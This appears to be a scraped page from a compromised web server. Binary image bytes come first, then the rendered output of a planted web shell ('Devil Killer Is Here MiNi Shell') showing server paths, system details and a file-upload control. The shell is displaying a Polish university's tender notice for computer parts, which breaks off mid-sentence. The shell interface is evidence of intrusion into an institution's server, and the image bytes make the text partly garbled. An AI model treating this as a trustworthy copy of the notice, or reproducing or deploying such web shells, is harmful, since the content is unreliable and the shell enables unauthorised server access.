JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023349201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy części i akcesoriów komputerowych, nośników danych przez okres 12 miesięcy dla Jednostek Śląskiego Uniwersytetu Medycznego<br/>w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ŚLĄSKI UNIWERSYTET MEDYCZNY W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000289035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Księcia Józefa Poniatowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@sum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy części i akcesoriów komputerowych, nośników danych przez okres 12 miesięcy dla Jednostek Śląskiego Uniwersytetu Medycznego<br/>w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-64e75094-bf9c-4c77-b907-c99944c702a3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00233492</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00671592/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.46 SPRZĘT ZWIĄZANY Z KOMPUTERAMI. Akcesoria komputerowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sum.eb2b.com.pl/organizer-auctions.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sum.eb2b.com.pl/organizer-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://platforma.eb2b.com.pl/user/terms<br/>lub https://tt.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie<br/>rejestrując się lub logując (gdy posiada konto w Platformie<br/>Zakupowej), akceptuje warunki korzystania z Platformy Zakupowej, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem danych osobowych wykonawców i osób uczestniczących<br/>w przedmiotowym postępowaniu jest Zamawiający;<br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach dotyczących przetwarzania<br/>danych osobowych pod numerem tel. 32 208 3600, sum.edu.pl, iod.sum.edu.pl;<br/>3) Dane osobowe wykonawców i osób uczestniczących w postępowaniu przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z prowadzonym postępowaniem;<br/>4) Odbiorcami danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu są merytorycznie<br/>odpowiedzialni pracownicy Zamawiającego posiadający upoważnienie do przetwarzania danych osobowych. Odbiorcami danych<br/>osobowych będą również osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 Pzp<br/>oraz art. 74 ust. 4 Pzp;<br/>5) dane osobowe osób uczestniczących w postępowaniu będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały okres obowiązywania umowy. Dla dokumentacji postępowań o udzielenie zamówienia publicznego dla projektów<br/>realizowanych z funduszy Unii europejskie, funduszy pozaunijnych i innych państw data archiwizacji liczona jest od roku kolejnego<br/>od daty zakończenia programu lub projektu, chyba że umowa przewiduje inaczej.<br/>6) obowiązek podania przez wykonawcę danych osobowych bezpośrednio jego dotyczących oraz danych osób uczestniczących w<br/>postępowaniu jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp;<br/>7) w odniesieniu do danych osobowych osób uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) osoby uczestniczące w przedmiotowym postępowaniu posiadają:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych bezpośrednio ich dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania przez wykonawcę uczestniczącego w przedmiotowym postępowaniu danych<br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa UOD, gdy uzna, że przetwarzanie danych osobowych dotyczących wykonawców i<br/>uczestników przedmiotowego zamówienia narusza przepisy RODO;<br/>9) nie przysługuje wykonawcy i osobom uczestniczącym w przedmiotowym postępowaniu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych wykonawców i osób uczestniczących w postępowaniu jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP/TP/35/1/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem postępowania są sukcesywne dostawy części i akcesoriów komputerowych, nośników danych przez okres 12<br/>miesięcy dla Jednostek Śląskiego Uniwersytetu Medycznego w Katowicach.<br/>1) Zamawiający przewidział możliwość wydłużenia okresu realizacji zamówienia (powyżej 12 miesięcy) do wyczerpania<br/>kwoty przeznaczonej na realizację zamówienia na dalszy czas oznaczony, nie dłużej jednak niż o 6 miesięcy.<br/>2) Zamawiający przewidział brak ograniczeń co do ilości oraz cykliczności dostaw.<br/>3) Zamawiający przewidział, zgodnie z art. 433 pkt 4 ustawy Pzp, gwarantowany poziom realizacji zamówienia w wysokości<br/>60% wartości brutto zamówienia.<br/>4) Zamawiający przewidział określoną w Specyfikacji asortymentowo-cenowej ilość przedmiotu zamówienia jako ilość<br/>szacunkową i zastrzegł prawo zwiększania bądź zmniejszania ilości przedmiotu zamówienia w poszczególnych pozycjach<br/>Specyfikacji asortymentowo-cenowej z zastrzeżeniem, że całkowita wartość zamówień nie przekroczy wartości brutto<br/>umowy.<br/>2. Nie dopuszcza się złożenia oferty częściowej.<br/>3. Przedmiot zamówienia należy zrealizować w oparciu o założenia określone w Specyfikacji technicznej i asortymentowo cenowej stanowiących odpowiednio załącznik nr 2 i 3 do SWZ oraz w Projektowanych postanowieniach umowy (załącznik<br/>nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30230000-0 - Sprzęt związany z komputerami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233150-7 - Napędy dysku optycznego</p> <p class="mb-0">30234000-8 - Nośniki do przechowywania</p> <p class="mb-0">30234100-9 - Dysk magnetyczny</p> <p class="mb-0">30234500-3 - Pamięci do przechowywania danych</p> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <p class="mb-0">30237135-4 - Karty sieciowe</p> <p class="mb-0">30237100-0 - Części komputerów</p> <p class="mb-0">30237120-6 - Porty komputerowe</p> <p class="mb-0">30237200-1 - Akcesoria komputerowe</p> <p class="mb-0">30237220-7 - Podkładki pod myszy</p> <p class="mb-0">30237270-2 - Torby na komputery przenośne</p> <p class="mb-0">30237280-5 - Akcesoria zasilające</p> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">30237460-1 - Klawiatury komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie o<br/>niepodleganiu wykluczeniu o którym mowa w art. 125 ust. 1 Pzp uzupełnione o przesłanki wykluczenia, o których mowa w art. 7 ust.<br/>1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) (wzór stanowi załącznik nr 5 do SWZ) - składane z ofertą.<br/>2) Oświadczenie w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub<br/>wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>Oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie oraz podmiot, na zasoby którego powołuje się<br/>wykonawca (wzór stanowi załącznik nr 6 do SWZ) - składane na wezwanie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Rozdział XXVI SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>- ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty zobowiązani są złożyć pełnomocnictwo,<br/>- ofertę muszą podpisać w sposób wiążący wszystkich Wykonawców występujących wspólnie,<br/>- oświadczenia z art. 125 Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>- korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>- zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Pzp („(…), z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zmiany terminu realizacji Umowy w przypadku niewyczerpania wartości brutto Umowy określonej w § 2 ust. 1, lecz nie<br/>dłużej niż o 6 miesięcy. W takim przypadku Zamawiający przygotuje aneks do umowy;<br/>2) zmiany produktu lub produktów objętych Umową w przypadku ich niedostępności spowodowanej przyczynami<br/>niezależnymi od Wykonawcy, w szczególności obejmującymi zakończenie produkcji lub wycofanie określonych wyrobów z<br/>obrotu, na inne produkty zaoferowane przez Wykonawcę – pod warunkiem, że produkty te będą posiadały parametry<br/>funkcjonalne i użytkowe nie gorsze od produktów podlegających wymianie oraz, że zostaną zaaprobowane przez<br/>Zamawiającego, przy zachowaniu lub obniżeniu ich ceny. Zamawiający zastrzega sobie prawo zmiany Umowy w zakresie<br/>określonym w treści tego postanowienia lub do zrezygnowania z zakupu niedostępnych produktów bez ich zastępowania<br/>innymi produktami zaoferowanymi przez Wykonawcę. W przypadku decyzji o zmianie Umowy, Wykonawca zobowiązany<br/>będzie do przedstawienia pisemnego oświadczenia producenta potwierdzającego zakończenie produkcji lub wycofanie<br/>zaoferowanego asortymentu z obrotu. W przypadku ustalenia przez Strony, że zaistniały przesłanki uzasadniające zmianę,<br/>Zamawiający przygotuje aneks do umowy;<br/>3) zaistnienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy. W<br/>takim przypadku Strony winny się powiadomić (w terminie obowiązywania Umowy) o zaistniałej sytuacji wraz ze<br/>szczegółowym opisaniem zaistniałej zmiany i wynikających stąd konsekwencji, przedstawiając jednocześnie propozycję<br/>zmiany Umowy. W zależności od tego, czy zmiana wpływa na zapisy Umowy czy też wyłącznie na kwestie nieuregulowane<br/>w niej pisemnie, Zamawiający przygotuje odpowiednio Aneks do umowy lub wyrazi pisemną zgodę na zmianę;<br/>4) zmiany stawki podatku VAT w przypadku zmiany przepisów ustawy o podatku od towarów i usług w odniesieniu<br/>odpowiednio do całości lub danej części przedmiotu zamówienia, którego zmiana dotyczy, przy czym wartość netto<br/>określona w Umowie jest wartością stałą. W takim przypadku Zamawiający przygotuje aneks do umowy.<br/>5) zmiany wysokości min. wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie<br/>ustawy z dnia 10 października 2002r. o min. wynagrodzeniu za pracę, jeżeli zmiany te będą miały wpływ na koszty<br/>wykonania zamówienia przez wykonawcę;<br/>6) zmiany zasad podlegania ubezp. społecznym lub ubezp. zdrowotnemu lub wysokości stawki składki na ubezp. społ. lub<br/>ubezp. zdr., jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę;<br/>7) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572), jeżeli<br/>zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>2. W przypadku wystąpienia przeszkody w realizacji Umowy, w tym przeszkody spowodowanej działaniem siły wyższej,<br/>Wykonawca niezwłocznie zawiadomi Zamawiającego o zaistniałej przeszkodzie. W takie sytuacji Strony uzgodnią tryb<br/>dalszego postępowania i ewentualnie nowe warunki realizacji przedmiotu Umowy.<br/>MAX. liczba znaków w tym polu 4000, pozostały zakres przewidzianych zmian w polu inf.dodatkowe oraz we wzorze umowy<br/>- załącznik nr 4 do SWZ - Wzór umowy, paragraf 9 i 10. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sum.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 3. W przypadku, gdy w okresie obowiązywania Umowy wystąpi zmiana, o której mowa w ust. 1 pkt 5-7, tj. zmiana wysokości<br/>minimalnego wynagrodzenia za pracę ustalonego na podstawie właściwych przepisów, zmiana zasad podlegania<br/>ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub<br/>zdrowotne lub zmiana zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, gdy zmiana ta lub<br/>zmiany będą miały wpływ na koszty wykonania Umowy przez 